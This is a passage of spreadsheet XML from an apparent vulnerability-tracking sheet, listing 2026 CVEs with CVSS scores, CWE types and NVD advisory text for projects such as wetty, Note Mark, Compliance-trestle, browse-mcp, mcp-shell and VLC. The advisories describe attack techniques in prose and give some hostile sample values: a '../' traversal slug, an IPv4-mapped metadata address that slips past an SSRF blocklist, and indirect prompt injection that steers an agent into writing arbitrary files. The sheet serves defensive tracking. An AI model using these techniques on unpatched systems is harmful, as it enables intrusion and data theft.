      </c>
      <c r="B1394" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49310</t>
        </is>
      </c>
      <c r="C1394" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1394" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1394" s="5" t="inlineStr"/>
      <c r="F1394" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1394" s="5" t="inlineStr"/>
      <c r="H1394" s="5" t="inlineStr"/>
      <c r="I1394" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1394" s="5" t="inlineStr"/>
      <c r="K1394" s="5" t="inlineStr">
        <is>
          <t>CWE-264</t>
        </is>
      </c>
      <c r="L1394" s="5" t="inlineStr">
        <is>
          <t>Permission control vulnerability in the event notification module.
Impact: Successful exploitation of this vulnerability may affect service confidentiality.</t>
        </is>
      </c>
      <c r="M1394" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49310</t>
        </is>
      </c>
    </row>
    <row r="1395">
      <c r="A1395" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1395" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49864</t>
        </is>
      </c>
      <c r="C1395" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1395" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1395" s="5" t="inlineStr"/>
      <c r="F1395" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1395" s="5" t="inlineStr"/>
      <c r="H1395" s="5" t="inlineStr"/>
      <c r="I1395" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J1395" s="5" t="inlineStr"/>
      <c r="K1395" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1395" s="5" t="inlineStr">
        <is>
          <t>wetty provides terminal access in browser over http/https. Prior to version 3.0.4, the wetty client decodes a base64 filename from the file-download escape sequence and interpolates it raw into a Toastify HTML string (`escapeMarkup: false`). Any output the victim renders - a `cat`'d file, a tailed log, an SSH MOTD, a `curl` response - that contains `\x1b[5i...:...\x1b[4i` runs script in the wetty origin and types attacker-chosen keystrokes into the victim's SSH session. Version 3.0.4 fixes the issue.</t>
        </is>
      </c>
      <c r="M1395" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49864</t>
        </is>
      </c>
    </row>
    <row r="1396">
      <c r="A1396" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1396" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50553</t>
        </is>
      </c>
      <c r="C1396" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1396" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1396" s="5" t="inlineStr"/>
      <c r="F1396" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1396" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H1396" s="5" t="inlineStr"/>
      <c r="I1396" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1396" s="5" t="inlineStr"/>
      <c r="K1396" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-22</t>
        </is>
      </c>
      <c r="L1396" s="5" t="inlineStr">
        <is>
          <t>Note Mark is an open-source note-taking application. Prior to version 0.19.5, Note Mark validates book and note slug values with the OpenAPI/huma tag pattern:"[a-z0-9-]+". huma compiles this with regexp.MustCompile(s.Pattern) and tests it with patternRe.MatchString(str), an UNANCHORED match. Because the pattern is not anchored (^...$), any string that merely CONTAINS one [a-z0-9-] substring passes validation. A slug such as ../../../../../../tmp/escape is accepted and stored verbatim. The data-export CLI commands (note-mark migrate export and note-mark migrate export-v1) join these unsanitized slugs straight into the output path with path.Join / filepath.Join, then os.MkdirAll the directory and os.Create the note file. path.Join resolves the ../ segments, so the note content file is written OUTSIDE the configured export directory. The export process commonly runs as root (default in Docker / bare-metal admin usage), so this is a root-privilege arbitrary directory create + file write. This issue has been patched in version 0.19.5.</t>
        </is>
      </c>
      <c r="M1396" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50553</t>
        </is>
      </c>
    </row>
    <row r="1397">
      <c r="A1397" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1397" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52776</t>
        </is>
      </c>
      <c r="C1397" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1397" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1397" s="5" t="inlineStr"/>
      <c r="F1397" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1397" s="5" t="inlineStr"/>
      <c r="H1397" s="5" t="inlineStr"/>
      <c r="I1397" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J1397" s="5" t="inlineStr"/>
      <c r="K1397" s="5" t="inlineStr">
        <is>
          <t>CWE-184, CWE-918</t>
        </is>
      </c>
      <c r="L1397" s="5" t="inlineStr">
        <is>
          <t>Compliance-trestle (Trestle) is a tooling platform for managing compliance as code. In versions before 3.12.4 and versions 4.0.0 through 4.0.3, the URLSecurityValidator that guards trestle's remote-fetch paths against server-side request forgery can be bypassed to reach loopback, link-local, cloud-metadata, and internal network endpoints it was designed to block. The blocklist does not canonicalize IPv4-mapped IPv6 literals such as [::ffff:169.254.169.254], which resolve to IPv6Address objects that never match the blocked IPv4 ranges, and it does not block the unspecified address 0.0.0.0, which routes to local services on Linux and inside containers. An attacker who can supply or influence an OSCAL artifact that trestle fetches, such as a malicious profile whose imports reference one of these bypass URLs, can cause the HTTPSFetcher and SFTPFetcher paths to contact cloud instance-metadata services, loopback interfaces, or internal hosts. This issue is fixed in versions 3.12.4 and 4.1.0.</t>
        </is>
      </c>
      <c r="M1397" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52776</t>
        </is>
      </c>
    </row>
    <row r="1398">
      <c r="A1398" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1398" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52854</t>
        </is>
      </c>
      <c r="C1398" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1398" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1398" s="5" t="inlineStr"/>
      <c r="F1398" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1398" s="5" t="inlineStr"/>
      <c r="H1398" s="5" t="inlineStr"/>
      <c r="I1398" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J1398" s="5" t="inlineStr"/>
      <c r="K1398" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-80</t>
        </is>
      </c>
      <c r="L1398" s="5" t="inlineStr">
        <is>
          <t>Maps is a MediaWiki extension that enables visualization of geographic data through dynamic embedded maps. Prior to version 12.1.3, the display_map parser function in the Leaflet service accepts attacker-controlled HTML in the overlays parameter, and resources/leaflet/jquery.leaflet.js uses the overlay name as a Leaflet layer-control label without escaping it. A wiki user with the edit permission can store malicious wikitext that causes script execution when another user previews or views the affected map. The script executes in the viewing user's browser session and can access data or perform actions available to that user. This issue is fixed in version 12.1.3.</t>
        </is>
      </c>
      <c r="M1398" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52854</t>
        </is>
      </c>
    </row>
    <row r="1399">
      <c r="A1399" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1399" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53455</t>
        </is>
      </c>
      <c r="C1399" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1399" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1399" s="5" t="inlineStr"/>
      <c r="F1399" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1399" s="5" t="inlineStr"/>
      <c r="H1399" s="5" t="inlineStr"/>
      <c r="I1399" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J1399" s="5" t="inlineStr"/>
      <c r="K1399" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1399" s="5" t="inlineStr">
        <is>
          <t>Blueprint Studio is a VS Code-like file editor for Home Assistant configuration files. Prior to 2.5.2, Blueprint Studio generated a shell-based Git credential helper in custom_components/blueprint_studio/backend/git_manager.py by interpolating the configured Git username and token directly into executable helper script content without validating credential values. An attacker able to set Git credentials could include newline characters or shell syntax in a username or token. When Git executed the generated credential helper, the injected shell commands ran with the operating-system privileges of Home Assistant and could access or modify Home Assistant configuration data. This issue is fixed in version 2.5.2.</t>
        </is>
      </c>
      <c r="M1399" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53455</t>
        </is>
      </c>
    </row>
    <row r="1400">
      <c r="A1400" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1400" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53783</t>
        </is>
      </c>
      <c r="C1400" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1400" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1400" s="5" t="inlineStr"/>
      <c r="F1400" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1400" s="5" t="inlineStr"/>
      <c r="H1400" s="5" t="inlineStr"/>
      <c r="I1400" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J1400" s="5" t="inlineStr"/>
      <c r="K1400" s="5" t="inlineStr">
        <is>
          <t>CWE-59, CWE-88</t>
        </is>
      </c>
      <c r="L1400" s="5" t="inlineStr">
        <is>
          <t>rsync before 3.5.0 contains a time-of-check to time-of-use (TOCTOU) race condition vulnerability in the rrsync restricted shell wrapper that allows authenticated clients to escape enforced directory restrictions by substituting a symlink for a path component after validation but before transfer processing. Attackers can additionally leverage unrestricted flags such as --copy-unsafe-links, -D, and --log-file through rrsync to read or write files outside the permitted directory subtree.</t>
        </is>
      </c>
      <c r="M1400" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53783</t>
        </is>
      </c>
    </row>
    <row r="1401">
      <c r="A1401" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1401" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54511</t>
        </is>
      </c>
      <c r="C1401" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1401" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1401" s="5" t="inlineStr"/>
      <c r="F1401" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1401" s="5" t="inlineStr"/>
      <c r="H1401" s="5" t="inlineStr"/>
      <c r="I1401" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J1401" s="5" t="inlineStr"/>
      <c r="K1401" s="5" t="inlineStr">
        <is>
          <t>CWE-117, CWE-93</t>
        </is>
      </c>
      <c r="L1401" s="5" t="inlineStr">
        <is>
          <t>LogTape is an unobtrusive logging library. Prior to 1.3.11, 2.0.14, and 2.1.5, the @logtape/syslog package's escapeStructuredDataValue() function in packages/syslog/src/syslog.ts does not neutralize C0 control characters from U+0000 through U+001F in structured data values, and formatStructuredData() inserts property keys without validating the RFC 5424 SD-NAME grammar. When includeStructuredData is true, an attacker-controlled newline can terminate an RFC 6587 non-transparent TCP syslog frame and make following bytes appear as a forged RFC 5424 record, while a key containing a closing bracket or other forbidden character can terminate or corrupt the structured-data element. Applications that forward attacker-controlled property values or keys can therefore allow forged records with arbitrary hosts, applications, process identifiers, facilities, or severity levels, undermining downstream collector and SIEM integrity. This issue is fixed in versions 1.3.11, 2.0.14, and 2.1.5.</t>
        </is>
      </c>
      <c r="M1401" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54511</t>
        </is>
      </c>
    </row>
    <row r="1402">
      <c r="A1402" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1402" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54603</t>
        </is>
      </c>
      <c r="C1402" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1402" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1402" s="5" t="inlineStr"/>
      <c r="F1402" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1402" s="5" t="inlineStr"/>
      <c r="H1402" s="5" t="inlineStr"/>
      <c r="I1402" s="5" t="inlineStr">
        <is>
          <t>2026-07-28</t>
        </is>
      </c>
      <c r="J1402" s="5" t="inlineStr"/>
      <c r="K1402" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-601</t>
        </is>
      </c>
      <c r="L1402" s="5" t="inlineStr">
        <is>
          <t>OAuth2 is a Ruby wrapper for the OAuth 2.0 and 2.1 authorization frameworks, including OpenID Connect (OIDC). From 0.4.0 to 2.0.21, a protocol-relative redirect Location returned to OAuth2::Client#request overrides the request authority, so the bearer Authorization header is sent to an attacker-controlled host, leaking the credential. This issue is fixed in version 2.0.22.</t>
        </is>
      </c>
      <c r="M1402" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54603</t>
        </is>
      </c>
    </row>
    <row r="1403">
      <c r="A1403" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1403" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54650</t>
        </is>
      </c>
      <c r="C1403" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1403" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1403" s="5" t="inlineStr"/>
      <c r="F1403" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1403" s="5" t="inlineStr"/>
      <c r="H1403" s="5" t="inlineStr"/>
      <c r="I1403" s="5" t="inlineStr">
        <is>
          <t>2026-07-28</t>
        </is>
      </c>
      <c r="J1403" s="5" t="inlineStr"/>
      <c r="K1403" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1403" s="5" t="inlineStr">
        <is>
          <t>openhole exposes localhost to the internet in one command. In 0.1.1 and earlier, openhole-server in internal/server/public_proxy.go forwarded r.URL.Path instead of preserving the original request target with r.URL.EscapedPath(), allowing percent encoded dot segments %2e and separators %2f to reach tunneled local services as ../ and / for path traversal. This issue is fixed in version 0.1.2.</t>
        </is>
      </c>
      <c r="M1403" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54650</t>
        </is>
      </c>
    </row>
    <row r="1404">
      <c r="A1404" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1404" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54730</t>
        </is>
      </c>
      <c r="C1404" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1404" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1404" s="5" t="inlineStr"/>
      <c r="F1404" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1404" s="5" t="inlineStr"/>
      <c r="H1404" s="5" t="inlineStr"/>
      <c r="I1404" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J1404" s="5" t="inlineStr"/>
      <c r="K1404" s="5" t="inlineStr">
        <is>
          <t>CWE-284, CWE-807</t>
        </is>
      </c>
      <c r="L1404" s="5" t="inlineStr">
        <is>
          <t>authentik is an open-source identity provider. Prior to 2026.2.6 and 2026.5.5, the enterprise Google Chrome device-trust stages advance the flow without confirming that the out-of-band device attestation actually ran. Affected enterprise deployments place either a Google Chrome Endpoint stage with mode set to REQUIRED or the deprecated Google Chrome Device Trust Connector stage in an authentication flow. The device attestation occurs in a verification iframe that calls the Google Verified Access API and records the verified device on success, but the vulnerable stages treat the flow as passed as soon as the stage is submitted. An attacker who can reach such a stage, including after primary username and password authentication, can skip the verification iframe and authenticate from a device that was never verified. Where device trust is the only additional factor, that protection is fully bypassed, while other configured factors remain in force. This issue is fixed in versions 2026.2.6 and 2026.5.5.</t>
        </is>
      </c>
      <c r="M1404" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54730</t>
        </is>
      </c>
    </row>
    <row r="1405">
      <c r="A1405" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1405" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55182</t>
        </is>
      </c>
      <c r="C1405" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1405" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1405" s="5" t="inlineStr"/>
      <c r="F1405" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="G1405" s="5" t="inlineStr"/>
      <c r="H1405" s="5" t="inlineStr"/>
      <c r="I1405" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J1405" s="5" t="inlineStr"/>
      <c r="K1405" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="L1405" s="5" t="inlineStr">
        <is>
          <t>LibreNMS is a network monitoring system. In versions from 21.6.0 up to 26.5.0, the Signal alert transport is vulnerable to command injection because the signal-cli path and the Recipient field of an alert transport entry are insufficiently escaped before being passed to an exec call. An authenticated administrator can craft a transport entry whose Recipient contains shell metacharacters and whose path points to the bundled composer_wrapper.php script, which itself passes attacker-controlled input to further unsafe exec calls. By chaining these calls, the administrator can execute arbitrary operating-system commands on the LibreNMS host. This issue is fixed in version 26.5.0.</t>
        </is>
      </c>
      <c r="M1405" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55182</t>
        </is>
      </c>
    </row>
    <row r="1406">
      <c r="A1406" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1406" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55534</t>
        </is>
      </c>
      <c r="C1406" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1406" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1406" s="5" t="inlineStr"/>
      <c r="F1406" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1406" s="5" t="inlineStr"/>
      <c r="H1406" s="5" t="inlineStr"/>
      <c r="I1406" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J1406" s="5" t="inlineStr"/>
      <c r="K1406" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L1406" s="5" t="inlineStr">
        <is>
          <t>PraisonAI is a multi-agent teams system. From praisonai 4.6.34 until 4.6.58, praisonai serve agents accepts --api-key but _create_agents_app() does not authenticate POST /agents or POST /agents/{agent_name}. A network caller can invoke configured agents without credentials even when an API key was supplied. This issue is fixed in version 4.6.58.</t>
        </is>
      </c>
      <c r="M1406" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55534</t>
        </is>
      </c>
    </row>
    <row r="1407">
      <c r="A1407" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1407" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55539</t>
        </is>
      </c>
      <c r="C1407" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1407" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1407" s="5" t="inlineStr"/>
      <c r="F1407" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1407" s="5" t="inlineStr"/>
      <c r="H1407" s="5" t="inlineStr"/>
      <c r="I1407" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J1407" s="5" t="inlineStr"/>
      <c r="K1407" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L1407" s="5" t="inlineStr">
        <is>
          <t>PraisonAI is a multi-agent teams system. Prior to praisonai 4.6.51, the Jobs API create_app function mounts /api/v1/runs without authentication. Any reachable caller can submit jobs, read results, cancel runs, or delete jobs using operator credentials. The fix adds PRAISONAI_JOBS_API_KEY middleware for Authorization or X-API-Key. This issue is fixed in version 4.6.58.</t>
        </is>
      </c>
      <c r="M1407" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55539</t>
        </is>
      </c>
    </row>
    <row r="1408">
      <c r="A1408" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1408" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55557</t>
        </is>
      </c>
      <c r="C1408" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1408" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1408" s="5" t="inlineStr"/>
      <c r="F1408" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1408" s="5" t="inlineStr"/>
      <c r="H1408" s="5" t="inlineStr"/>
      <c r="I1408" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J1408" s="5" t="inlineStr"/>
      <c r="K1408" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1408" s="5" t="inlineStr">
        <is>
          <t>browse-mcp is a Playwright-based headless-browser MCP server for MCP-capable agents. Prior to 0.8.2, browser_download writes a fetched response body to join(save_dir, filename) without validating the caller-controlled save_dir, while browser_save_state and browser_load_state honor a caller-controlled path unchanged. A malicious MCP client, or an autonomous agent steered by indirect prompt injection on a visited page, can choose an arbitrary save_dir or state path and a URL whose response body becomes attacker-controlled file contents, allowing writes to any path the process can reach, including ~/.bashrc, autostart entries, or cron files, and potentially leading to host code execution. The force_fetch fallback also uses a raw fetch() that bypasses the BROWSE_MCP_ALLOWED_ORIGINS origin fence. This issue is fixed in version 0.8.2.</t>
        </is>
      </c>
      <c r="M1408" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55557</t>
        </is>
      </c>
    </row>
    <row r="1409">
      <c r="A1409" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1409" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55580</t>
        </is>
      </c>
      <c r="C1409" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1409" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1409" s="5" t="inlineStr"/>
      <c r="F1409" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1409" s="5" t="inlineStr"/>
      <c r="H1409" s="5" t="inlineStr"/>
      <c r="I1409" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J1409" s="5" t="inlineStr"/>
      <c r="K1409" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1409" s="5" t="inlineStr">
        <is>
          <t>mcp-shell is an MCP server for running shell commands securely, auditably, and on demand. Prior to 0.6.0, config.go initializes Security.Enabled to false, and when MCP_SHELL_SEC_CONFIG_FILE is unset, main.go starts the documented bare-binary deployment without a security policy. SecurityValidator.validateCommand in security.go then short-circuits and allows every command supplied to the shell_exec MCP tool, so an LLM connected over stdio can execute unrestricted OS commands as the mcp-shell process user. The README from-source installation and MCP client configuration omit MCP_SHELL_SEC_CONFIG_FILE, making the insecure state the documented default. This issue is fixed in version 0.6.0.</t>
        </is>
      </c>
      <c r="M1409" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55580</t>
        </is>
      </c>
    </row>
    <row r="1410">
      <c r="A1410" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1410" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55848</t>
        </is>
      </c>
      <c r="C1410" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1410" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1410" s="5" t="inlineStr"/>
      <c r="F1410" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1410" s="5" t="inlineStr">
        <is>
          <t>java, kubernetes</t>
        </is>
      </c>
      <c r="H1410" s="5" t="inlineStr"/>
      <c r="I1410" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J1410" s="5" t="inlineStr"/>
      <c r="K1410" s="5" t="inlineStr">
        <is>
          <t>CWE-611</t>
        </is>
      </c>
      <c r="L1410" s="5" t="inlineStr">
        <is>
          <t>mapfish-print is a component of MapFish for printing templated cartographic maps. Prior to 3.28.30, 3.30.32, 3.31.24, 3.33.16, and 4.0.5, MapFish Print accepts an attacker-controlled GML layer url in requests to the /api/print3/print endpoint and fetches XML parsed by core/src/main/java/org/mapfish/print/map/geotools/GmlLayer.java without disabling external entities and external DTDs. A remote XML document and DTD can expand a local file entity, and the resulting content can be exposed through the GML parsing and error path. This allows unauthenticated attackers to read files such as operating-system account data, Kubernetes service-account tokens, and certificates. Replacing the file entity target with an internal HTTP endpoint also permits server-side request forgery. This issue is fixed in versions 3.28.30, 3.30.32, 3.31.24, 3.33.16, and 4.0.5.</t>
        </is>
      </c>
      <c r="M1410" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55848</t>
        </is>
      </c>
    </row>
    <row r="1411">
      <c r="A1411" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1411" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56703</t>
        </is>
      </c>
      <c r="C1411" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1411" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1411" s="5" t="inlineStr"/>
      <c r="F1411" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="G1411" s="5" t="inlineStr"/>
      <c r="H1411" s="5" t="inlineStr"/>
      <c r="I1411" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J1411" s="5" t="inlineStr"/>
      <c r="K1411" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L1411" s="5" t="inlineStr">
        <is>
          <t>Adminer before 5.4.3 contains a remote code execution vulnerability in SQLite query handling where VACUUM INTO is not blocked despite ATTACH restrictions. Authenticated attackers can execute VACUUM INTO to write PHP code to arbitrary file paths and execute commands on the server.</t>
        </is>
      </c>
      <c r="M1411" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56703</t>
        </is>
      </c>
    </row>
    <row r="1412">
      <c r="A1412" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1412" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56711</t>
        </is>
      </c>
      <c r="C1412" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1412" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1412" s="5" t="inlineStr"/>
      <c r="F1412" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1412" s="5" t="inlineStr"/>
      <c r="H1412" s="5" t="inlineStr"/>
      <c r="I1412" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1412" s="5" t="inlineStr"/>
      <c r="K1412" s="5" t="inlineStr">
        <is>
          <t>CWE-190, CWE-787</t>
        </is>
      </c>
      <c r="L1412" s="5" t="inlineStr">
        <is>
          <t>VLC media player computes the size of a picture buffer with 32-bit arithmetic and allocates from the wrapped result. In AllocatePicture in src/misc/picture.c the running total is accumulated as i_bytes += p-&gt;i_pitch * p-&gt;i_lines, and both plane_t fields are declared int in include/vlc_picture.h, so the multiplication is evaluated at 32 bits and wraps before it is widened to the size_t accumulator. The overflow check that precedes it divides in 64-bit arithmetic and therefore does not constrain the product, and the subsequent comparison against PICTURE_SW_SIZE_MAX examines the already wrapped value, so both guards pass. aligned_alloc then reserves the small wrapped size while the decoder writes scanlines sized from the original dimensions. A crafted PNG whose IHDR declares large width and height reaches this path through the image demuxer, whose only size guard is on the input file's byte count rather than the declared dimensions, and the decoder in modules/codec/png.c writes past the end of the allocation with attacker-influenced length and content. Opening the file directly or through a playlist entry is sufficient, with no non-default settings.</t>
        </is>
      </c>
      <c r="M1412" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56711</t>
        </is>
      </c>
    </row>
    <row r="1413">
      <c r="A1413" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
